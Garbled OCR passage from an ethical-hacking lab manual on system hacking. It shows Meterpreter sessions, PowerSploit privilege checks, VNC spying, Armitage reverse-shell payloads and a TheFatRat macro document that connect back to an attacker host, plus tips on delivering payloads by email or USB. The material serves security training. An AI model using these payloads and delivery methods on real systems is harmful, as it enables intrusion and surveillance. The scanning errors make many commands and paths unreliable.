2019-11-04 07:03 72K ) Server at 10.10.10.13 Port 80 (EH Lab Manual Pope 32 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.[Module 06 - System Hacking 19, Once you click on the Testexe file, the Opening Testiexe pop-up appears; sclect Save File. 20. The malicious file will download to the browser's default download location (here, Downloads). Now, navigate to this location and double- click the Test.exe file to run it PF dowloads TA] | serch Downes ure L411 Maus fe sueessfily download 21. ‘The Open File - Security Warning window appears; click Run. (Open File Secunty Wismning ‘The publisher could not be verified. Are you sure you want to run this software? Name: C\Users\Admin\Downloads\Testexe Publisher: Unknown Publisher Type Application From: C\Users\Admin\Downloads\Test.exe Sy [ZAbwaysaskbetore opening this file 0 ae. Figure 14.12: Seeunity warming om accu he ve He 22. Leave the Windows 10 virtual machine running, so that the Test.exe file ‘runs in the background and switch (0 the Parrat Seeurity virtual machine. 23. Observe that one session has been created or opened in the Meterpreter ‘shell, as shown in the screenshot. (CoH Lab Manual Page 532 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 3: Mterpetr shell ares obeinad 24. Type sysinfo and press Enter to verify that you have hacked the target Windows 10. Note: If the Meterpreter shell is not automatically connected to the session, ions -i 4 and press Enter to open a session in Metcepecter shell jother Parrot Terminal and navigate to the root directory Drasx <7 25. Now, oper 26, In the Terminal window, type git elone Find Misconfigurations bttps:/github.com/PowerShellMafiaPowerSploit and press Enter. The In the Target PowerSploit repository is downloaded to the reet directory System (eH Lab Manual Pope S34 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking Note: You can also access the tool repository from the CBH-Teoks folder available in Windows 10 virtual machine, in case, the Git! lub link does not exist, or you are unable to clone the tool repository. Follow the steps below in order to access CEH-Tools fokier from the Parrot Security virtual machine: * Open any explorer window and press Ctri#L. The Location field appears; [ype smbz/40.10.40.40 and press Enter 10 access Windows 40 shared folders "The security pop-up appears; enter the Windows 10 victual machine credentials (Username: Admin and Password: PaS$wOrd) and click Connect. + ‘The Windows shares on 10.10.10.10 window appears; navigate 10 the location CEH-ToolsICEHv11 Module 06 System Hacking/GitHub Tools! and copy the PewerSploit foldee. * Paste the copied PowerSploit folder on the location ihomefattacker! * In the terminal window, type mv hhomelattacker/PowerSploit /rootl 27. Now, switch back to the Terminal window with an active Meterpreter session, Type upload rootPowerSploitPrivescPowerUp.ps1 PowerUp.pst and press Enter. This command uploads the PowesSploit file (PewerUp.ps4) 10 the target system’s present working directory Fire ANG Upload eo the ete 28. Type shell and press Enter to open a shell session. Observe that the present working directory points to the Downloads folder in the system. (eH Lab Manual Pape 35 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 29. ‘Type powershell -ExecutionPolicy Bypass Command “, JPowerUppstinvoke-AliChecks” and press Enter (o run the PowerUppst Note: PowerUp.psI is a program that enables a user to perform quick checks against a Windows machine for any privilege escalation opportunities. It utilizes various service abuse checks, .dll hijacking opportunities, registry checks, ete. to enumenite common elevation methods for a target system, 301, A result appears, displaying vulnerabilities in unquoted service paths, service executables, argument permissions, DLL locations, service permissions, unattended install files, and other locations. Figite 14:0: Service asewable ad apment persis by EE-Counel Ethical Making and Countermeasures Copy icy Prone. ‘A Rights Reserved. Reproductions (eH Lab Manual Pape 36Module 06 - System Hacking Figure 1420 Poel lable DL. ction Note: Attackers exploit misconfigured services such as unquoted service aths, service object permissions, unattended installs, modifiable registry autoruns and configurations, and other locations to elevate access privileges. After establishing an active session using Metasploit, attackers use tools such as PowerSploit to detect misconfigured services that exist in the tanget OS. 31. Now, type exit and press Enter to sevcet to the Meterpreter session. Brack 32. Now, exploit VNC vulnerability to gain remote access to the Windows ‘Open 40 virtual machine. ‘To do so, type rum vne and press Enter, VNC Session Fig 142k: Opening « VNC serio hgh mentee 33. This will open a VNC session for the target machine, as shown in the screenshot. Usin you can see the victim’s activities on the tem, including the files, websites, software, and other resources the user opens or runs. Ethical Macking and Countermeasures Copyright © by E-Soumell (EH Lab Manual Pope S37 ‘Al RightsReserved. Reproduction Sve Profits.BS TASK 5 CF Asagisn scipuble alert taliban le Seco vais teen come aon eents sieneed pon ‘pln amas in ihe ftmework: Using ths teak yoommense Pela Stemi rece Soomro sheng hed ve logan snot state pen eng oe (CoH Lab Manual Page S38 Module 06 - System Hacking Figure 1422: Vic's system cai acest ha VNC session 34. This concludes the demonstration of how to exploit client-side ‘vulnerabilities and establish a VNC session using Metasploit. 35. Close all open windows and document all the acquired information. Gain Access to a Remote System using Armitage Here, we will use the Armitage tool to gain access to the remote target machine. Note: In this task, we will use the Parrot Security (40.10.10.43) vistual machine as, the host system and the Windows 10 (10.10.10.10) virtual machine as the target system. Before starting this task, restart the Windews 40 virtual machine and login with the credentials Admin snd PaS$wOrd, 1. On the Perot Secanty virtual machine, click the MATE Terminaticon El ) at the top of Desktop to open the Parrot Terminal. 2. ‘The Parrot Terminal window appears. In the Terminal window, type sudo ‘swand press Enter fo run the programs as a root user. 3. In the [sudo] password for attacker ficld, type toor as a password and press Enter. Not The password that you type will not be visible. 4, Now, type ed and press Enter to jump to the root directory. Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 5. In the terminal window, type service postgresql start and press Enter to start the data Brasw 5.4 6. Click Applications in the top-left corner of Desktop and navigate to Launch Pentesting > Exploitation Tools > Metasploit Framework > armitage Armitage to launch the Armitage tool. 7. A security pop-up appears, eater the password as teor and click OK. word to perform administrativ Ethical Macking and Countermeasures Copyright © by E-Soumell (eH Lab Manual Pape 39 ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking pop-up appears; leave the settings to default and click the Connect button. 127.0.0.1 9, ‘The Start Metasploit? pop-up appears; click Yes. 10, The Progress. Armitage main window appears, as shown in the screenshot. pop-up appears. After the loading completes, the [conve x) (eH Lab Manual Page S40 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 11, Click on Hosts from the Menu bar and navigate to Nmap Sean > Intense Erasx 5.2 Sean to scan for live hosts in the network. Scan the Target armitage View jattacks Workspaces Help > (Bi auiiary | Import Hosts + @explot | _Add Hosts. > (i payioed i post ee econ Intense Scan + UDP mene Intense Scan, all TCP ports Clear Database Intense Scan, no ping Ping Scan Quick Scan Quick Scan (0S detect) Comprehensive 12, The Input pop-up appears. Type a target IP address (here, 10:40.10.10) and click OK. Enter scan range (e.9., 192.168.1,0/24: 10.10.10.10 {cancel igi 157 Lapa poop 13. After waiting for the sean to complete, a Message pop-up appears, displaying the Sean Complete! message; click OK. @ Scan Complete! Use Attacks->Find Attacks to suggest applicable exploits for your targets. Fipee Sk Means ip p 14, Observe that the target host (40.19.40.49) appears on the screen, as shown in the screenshot. (et Lab Manual Pope 544 Ethical Hacking and Countermeasures Copy © by EE Commel ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking Note: As it is known from the Intense scan that the target host is running, a Windows OS, the Windows OS logo also appears in the host icon. Now, from the lefichand pane, expand the payload node, and navigate to windows > meterpreter, double-click Generate and meterpreter reverse tcp. Send Payload BrasK 6.3 age, iow, Host ia undows| adduser » i dliject drs pt query exec download evee formats drves Bitoaauer TCU) (EH Lab Manual Pape 42 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 16, ‘The windowsimeterpreter reverse. tep window appears. Scroll down to the LPORT Option, and change the port Value to 444, In the Output ficld, select ‘exe from the drop-down options; click Launeh. idows Meterpreter Shell, Reverse TCP inline IConnect back to attacker and spawn a Meterpreter shell iterations KeepTemplateWorking LHOST: 10,10.10.13 Show advanced options gore 1.1: windows/entepcte severeep 17. ‘The Save window appears. Sclect Desktop as the location, set the File Name 2s malicious payload.exe, 2nd click the Save button. Look (a) Le) (as GDL [5 README. license Reconnaissance.html (5 results.htmi Testexe 2: [Imaiicious_payload.evel File Nami Files of Iype: (All Files 7) igure 15.12 Sethe file (et Lab Manual Pope 542 Ethical Hacking and Countermeasures Copy © by EE Commel "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 18, A Message pop-up appears; click OK. 19. Now, switch to the Terminal window, type ep irootiDesktopimalicious payload.exe NvariwwwhtmUsharel, and press Enter to copy the file to the shared folder. 20. Type service apache? start and press Enter to start the Apache server Figure 1.5.15: Copy the leo share flea 21, Now, in the left-hand pane, double-click meterpreter reverse top 2 View. Hosts. attacks, Workspat windows dd Bairjecr Ei fermat_al_drves loadibrary CEH Lab Manual Pope St Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.(CoH Lab Mama Page S45 [Module 06 - System Hacking 22, The windowsimeterpreter reverse tep wincow appears. Scroll down to LPORT Option and change the port Value to 444, Ensure that the multi/handier option is selected in the Output fields click Launch. indows Meterpreter Shell, Reverse TCP inne connect back to attacker and spawn a Meterprater shell Value 3 KeepTemplateWorking HOST 10.10.1013. Show advanced options Fine 1.5.15: windows entepttr sevete_ep sting 23. Now, switch to the Windows 10 virtual machine and open any web browser (here, Mozilla Firefox). In the address bar, type ‘http:/'10.10.10.13/share and press Enter. As soon as you press enter, the ystem will display the shared folder contents, as shown in the scecenshot. Note: Here, we are sending the malicious payload through a shared directory; however, in real-time, you can send it via an attachment in an email or through, physical means such as a hard drive ot pen dive. 24, Click malicious payload.exe to download the file. Note: 10.10.10.13 is the IP address of the host machine (here, the Parrot Security virtual machine). © eo snow Index of /share Name Lastimediisd Size Descrintion Parent Directory 240 TK 1 0713 250K Apache 4.38 Debian) Server at 1010.10.18 Por 80 ge 1.5.16: Downloading eiciousex le om the itis pt Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.[Module 06 - System Hacking lrasK 5.4 25. Once you click on the malicious payload.exe file, the Openi amie malicious payload.exe pop-up appears; sclect Save File. Payload 26. The malicious file will be downloaded to the browser's default download location (hese, Downloads). Now, double-click malicious payload.exe tormun the file Bi Dy = | Oownionsr Home nate view + 4 [ETRE PC Dowmionde TIE] search Downt: a Name . Date modifies 1 Quick acess Desktop |) LEeLmutious poyond a ’ G Bilstee 1B Documents # EPictwes ¢ [cet Toots Gcenmedy, gre 15.17: Maio Ge ucrily downed 27. The Open File - Security Warning window appears; click Run. (Open File- Security Warning ‘The publisher could not be verified. Are you sure you want to run this software? Name: CAUse1s\Admin\Downloads\malicious_payload.exe Publisher Unknown Publisher Type Application From: C:\Users\Admin\Downloads\malicious payload.ee a] eee [A Adwaye see betore opening thi fle ee eee 0) Sasori ae pure 15.18: Sceuty Waring on accusing te ve He 28. Leave the Windows 10 vierual machine running and switch to the Parrot ‘Security virtual machine. (CoH Lab Manual Page S45 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 29. Observe that one session bas been ereated or opened in the Meterpreter shell, as shown in the screenshot, and the host icon disp! Metablich = system name (WINDOWS10). Grask ss the targe ie _X] nmap x J windowsrmeterpreterteverse.teb | oa Ree Tent ser er areas Perper erent re eae eee at Hl rar eriearret eee Tee CR RT RT OST een) 30, Right-click on the target host and navigate to Meterpreter1 > Interact > Meterpreter Shell (EH Lab Manual Pope S47 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 31. A new Metorpreter 4 tal appears. Type sysinfo and press Enter to view the system details of the exploited system, as shown in the screenshot. > ii aanject a ane. queryxe (et S windowsmeterpreter reverse tcp_x [aterpreterl Snr om Pos) rs Pires mer ne tte System Language ir eterpreter Poor 32. Right-click on the target host and navigate to Materpreter 4 > Explore > Browse Files. Ethical Macking and Countermeasures Copyright © by E-Soumell CEH Lab Manual Pope S42 ‘Al RightsReserved. Reproduction Sve Profits.(CoH Lab Manual Page 549 a Module 06 - System Hacking 33. A new Files 4 tab and the present working directory of the target system appear. You can observe the files present in the Download folder of the target system. 34. Using this option, you can perform various functions such as uploading a file, making a directory, and listing all drives present in the target system, * Ga windows adducer > I aijece 20200416 14:28:43, Upload. || Make Drectoy | uct orves | | Refresh 35, Right-click on the targct host and navigate to Meterpreter 1 > Explore > Screenshot 198 Yew Hosts 7 Gi windows » BW aimecr ‘download exec — Eyeing Tmep_ | windowameterped a +\cmetDowrdoeds Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 36. A new Sereenshot 4 in the target system, ib appears, displaying the currently open windows ermage, We, Losts socks Workspaces bel SOR cast) ‘Console x [_—_nmap_X Materpeter 1X. 7 a 4 TEPC » Lec OtIC) + Use Downloads Osckeces : : 1 Date 4 Domions Tinsicoasaraae imilarly, you can explore other options such as Desktop (VNC), Show Processes, Log Keystrokes, ari Webcam Shot. 38. You can also escalate privileges in the target system using the Escalate Privileges option and further steal tokens, dump hashes, or perform other activities 39. This concludes the demonstration of how to gain access to a remote system using Armitage, 4 Hack a Windows Machine with a Malicious Office Document BTASK 6 using TheFatRat ). Close all open windows and document all the acquired information. Here, we will use TheFatRat to hack the Windows machine with a malicious offi Note: Before starting this task, install Microsoft Office on the target virtual machine (Window 10). 1, Inthe Parrot Security virtual machine, click the MATE Terminal icon at the top of the Desktop window to open a Terminal window. e document. (Ce Lab Manual Page S50 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking ¢ Soci 2. A Parrot Terminal window appears. In the terminal window, type sudo su engnessings cnc of and press Enter to run the programs as a root user. hacker’ none ply P " pee % used aeks. As een 3. In the [sudo] password for attacker ficld, type toor as a password and enka any bie onzniratione fll tim to the attack vector: The press Enter. Note: The password that you type will not be visible. swoiace 4. Now, eype ed and press Enter to jump to the root directory pit bla can even evade nt vis proses In the Parrot Terminal window, type git elone httpsuigithub.comvScreetsecTheFatRat and press Enter, TASK 6.4 Clone TheFatRat SS therutars aa exploitation oo hat compiles mabeare with pape plod that ean then beeseced on Wins, Anan Mac OSe. The wltwace create backdoors and Peas that can bypass Note: You can also access the tool repository from the CBH-Teols folder available in Windows 10 virtual machine, in case, the GitI ub link does not exist, or you are unable to clone the tool repository. Follow the steps below in order to access, 1m the Parrot Security virtual machine: * Open a windows explorer and press @trl¢L. ‘The Location field appears; {ype smb40.10.10.40 and pecss Enter to access Windows 40 shared folders (EH Lab Manual Pope S51 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking = ‘The security pop-up appears; enter the Windows 40 vietual machine credentials (Username: Admin and Password: PaS$wOrd) and click Connect. "The Windows shares on 10.10.10.10 window appears; navigate to the location GEH-ToolsICEHV11 Module 06 System Hacking/GitHub Tools! and copy the TheFatRat folder. * Paste the copied! TheFatRat folder on the location Momefattacker/ * Inthe terminal window, type mv homelattacker/TheF atRat /roott 6. After the cloning completes, type ed TheFatRat and press Enter. “Type ts and press Enter to view the files in the TheatRat folder. 8. Now, to run the scripts (fatrat, setup.sh, powerfull.sh) located in ‘TheFatRat folder, we must give them access permissions. To do so, use the below commands! = chmod +x fatrat and Enter = chmod +x /setup.sh and Enter "chmod +x Jpowerfull.sh and Enter (EH Lab Manual Pope S52 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 9. ‘Type dsetup.sh and hit Enter to begin the installation, Press Enter when the Press [ENTER] key to continue setup messize appears Task 6.2 Install ‘ThoFatRat 10. An instalation window appears as the system installs the required packs ran TheFatRat. Note: The installation of packages takes approximately 5 minutes to complete Note: If a pop-up asking for permission appears, use the arrow keys (© >) on. the keyboard to navigate to Yes and press Enter to continue re xh CEH Lab Manual Page 553, Ethical Hacking and Countermeasures Copyigh © by EE-Counell ‘A Rights Reserved. Reproductions icy Prone.Module 06 - System Hacking 11. After the installation completes, the Terminal window appears. Under Select one of the options bellow, ‘ypc 2 to choose the [2] Install Searchsploit from Kall Repository option and press Enter 12. Under the prompt, 80 you can run fatrat from anywhere In your terminal and desktop ?, (ype y and press Enter. 13. After the installation finishes, in the Terminal window, type fatrat and press Enter. TASK Make Backdoor File 14. ThoFatRat launches and starts to verify the installed dependencies, as shown in the sereenshot. (EH Lab Manual Pope S54 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 15. A Waring appears, as shown in the screenshot. Press Enter to continue Fre 1612 Waring ess gre by The aR cen tab anual Page s85 Ethical acing and Countermeasures Copy ©by #8 omel = ‘Al| Rights Reserved. Reproduction is Strictly Prohibited.Module 06 - System Hacking 16. ‘The Metasploit service is not running message appears; press Enter 0 continue, ‘You may get multiple prompts saying Press [Enter] key to Continue..., lo so to continue, 1 (EH Lab Manual Pope S56 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 18, TheFatRat menu appears; choose [06] Create Fud Backdoor 1000% with PwnWinds [Excelent] by typing 6 in the menu and pressing Enter. Cee (EH Lab Manual Pope $57 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 19. The PwmaWinds menu appears. Choose [3] Greate exe file with apache + Powershell (FUD 100%) by typing 3 in dhe menu and pressing Enter. (EH Lab Manual Pope S58 Ethical Making and Countermeasures Copy ‘A Rights Reserved. Reproductions by EE-Counel icy Prone.Module 06 - System Hacking 20. For Set LHOST IP, type 10.10.40.13 and press Enter 21. For Set LPORT, type 444d and press Enter 22. For the Please ent and press Enter. the base name for output files option, type payload Fre 1 Entesng dt ofl 23. For the Choose Payload option, choose [3] windowsimeterpreterireverse_tep by typing 3 and pressing Enter. (EH Lab Manual Pope S59 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 24. ‘The details about the generated payload appear and are saved at the location krootTheFatRat Generated. Press Enter io continue. 25, TheFatRat yenerites 1 payload.exe file locate! al root/Fatrat Generated, 1s shown ia the screenshot. (EH Lab Manual Pape 60 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 26. Now, to go back to the main menu, choose [9] Back to Menu by typing @ Btasn cia and press Enter. Make Malicious Word File (EH Lab Manual Page S62 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking From the menu, choose (07] Greate Backdoor For Office with Microsploit by typing 7 and press Enter. (EH Lab Manual Pope 62 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 28. The Mierosploit menu appears; choose option [2| The Microsoft Office Macro on Windows by typing 2 and press Enter. For Sot LHOST IP, type 10.10.40.43 and press Enter. 30, For the Set LPORT option, type 4444 and hit Enter. 31. For Enter the base name for output files, ‘yp: BadDoe snl press Enter. (EH Lab Manual Pope 62 Ethical Making and Countermeasures Copy ‘A Rights Reserved. Reproductions by EE-Counel icy Prone.(EH Lab Manual Pope S64 Module 06 - System Hacking 32. For Enter the message for the document body (ENTER = default) YOU HAVE BEEN HACKED It and press Enter. 33. For the Are u want Use custom press Enter. @ file backdoor (yin) option, type y and 34. For the Path option, type rootfFatrat Generatedipayload.exe and press Enter. 35. For the Cheese Payload option, choose [3] windowsimeterpreterireverse tep by typing 3 and press Enter. Ethical Making and Countermeasures Copy ‘A Rights Reserved. Reproductions by EE-Counel icy Prone.B rasn 6.5 Share the Malicious. Document File (CoH Lab Manual Page S65 Module 06 - System Hacking 36. ‘The malicious document details appear, as shown in the sereeashot. Press Enter to continue. Fe L627 Bakdonesed pope 37. Navigate to frootFatrat Generated to find the generated document file (BadDoe.doem), 2s shown in the screenshot 38. Now, open a new Terminal window and type ep irootFatrat Generated/BadDoc.docm ivariwwwihtmilshare to copy the generated malicious document to the shared folder. Note: Here, we are sending the malicious payload through a shared directory; but in real-time, you can send it via an attachment in the email or through physical means such as a hard drive or pen drive. 39. Start the apache seri Enter. To do this, type service apache2 start and press gue 1629, Wor le cop to the saa der Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 40, In the Terminal window, launch Metasploit by 1yping, mefeonsole and Bitasn cic) pressing Enter. Set Payload 41. In msfconsole, type use exploitimultifhandler and press Enter. CEH Lab Manual Page 566 Ethical Hacking and Countermeasures Copyigh © by EE-Counell ‘A Rights Reserved. Reproductions icy Prone.Module 06 - System Hacking 42, Now, we need to set the payload, LHOST, and LPORT. ‘To do so, use the below commands: * ‘Type set payload windowsimeterpreterireverse top and press Enter * Type set LHOST 10.10.10.13 and press Enter «Type set LPORT 4444 and press Enter 43. Afier entering the above d ails, type exploit and press Enter to start the listener. Fg 631 St thee 44. Switch to the Windows 40 virtual machine and open any web browser (here, Mozilla Firefox). In the address bar, type httpy/10.10.10.13ishare and press Enter. As soon as you press enter, the system will display the shared folder contents, as shown in the screenshot 45. Click BadDoe.doem to download the file. Note: 40.40.10.43 is the IP address of the host machine (here, the Parrot Security virtual machine). [ese @ [0 & tor or] ¢nOo® Index of /share 2 Puen Dien (fiaid= an] 5.6 18K H 2340 72K Apache2.4.38 (Debian) Server at 10.10.10.13 Port 80 gure 1.6.82: Dowabnating malicious exe leon the it's yam (EH Lab Manual Pope S67 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.[Module 06 - System Hacking 46, Once you click on the BadBee.doem file, the Opening BadDec.docm pop-up appeats; select Save Fi 47. The malicious file will download to the browser's defiult download location (herc, Downloads). Now, double-click the BadDoe.decm file to runit Downloads Home share View ~ 1 PE This 5 Downloads TG] | Seaich Downloads Nome Date modified Type aie 5 Bedok Miao Wi BadDocdocm Tact Word BE Destop & Downloads BB Documents E Pictwes h ceH-tooi item, Figure 14.3: Malicious le suceefily dnloaded 48. A Microsoft Word document appears with the file in PROTECTED VIEW. Click. Enable Editing, as shown in the screenshot. Fle Home ise Oesign Lyeut References Mags Review View Hep ‘tocol Tis cet et rented ey wc raion of Micro On: Dec eat ba ec lag ac of aa gm 16. Fa ing apron in MS Wend (CoH Lab Manual Page S6B Ethical Hacking and Countermessures Copyright © by EC-Coumel "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 49. A SECURITY WARNING appears; click Enable Content, as shown in the sereenshot. stcuRTY WARNING cor heve ben le otis This document we reste by 5 Macros must be enabled to display the cont ion of Microsoft Office the document 50. Now, switch back to the Parret Seeurity virtual machine and observe that one session is crcated or opened in the Meterpreter shell, as shown in the sereenshot jure 16.3: Meer shell ees bean (EH Lab Manual Pape S69 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 51. Type sysinfo and hit Enter to view the system details of the exploited computes, as shown in the screenshot. Bi TAsK 6.8 View Exploited ‘System Details Fipae 1657: Vesingesplel syne dea dg de comand ine 52. This concludes the demonstration of how to hack a Windows machine with a malicious office document using TheFatRat 53. Close all open windows and documeat all the acquired information, Perform Buffer Overflow Attack to Gain Access to a Remote BS TASK 7 TAS. System ‘This task demonstrates the exploitation procedure applied to a vulnerable server running on the victim’s system. This vulnerable server is attached to Immuni Debugger. Asan atta ker, we will exploit this server using malicious script to gain remote access to the victim’s system, Note: In this task, we use a Parrot Security (10.10.10.13) virtual machine as the host machine and a Windews 40 (10.10.10.10) vietual machine as the target machine. Grasw 74 1. In the Windows 40 virtual machine, navigate (0 EACEH-Tools\CEHv14 Launch Module 06 System Hacking\Buffer Overflow Tools\vulnserver, right- Kline ver click the fle vulnserver.exe, and click the Run an administrator option Note: If the User Account Control pop-up appears, click Yes to proceed. t Apeees zee of adjacent meoey Tocatons alleated program or application to hn its time da Baller vee or sulci in sppbcaions 0 prgrams| thataccen more cat than the locate. Tis serait alos the sppcaion to encod the barker whde wring daa tothe ner and onenarie naghbnene (EH Lab Manual Page 70 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.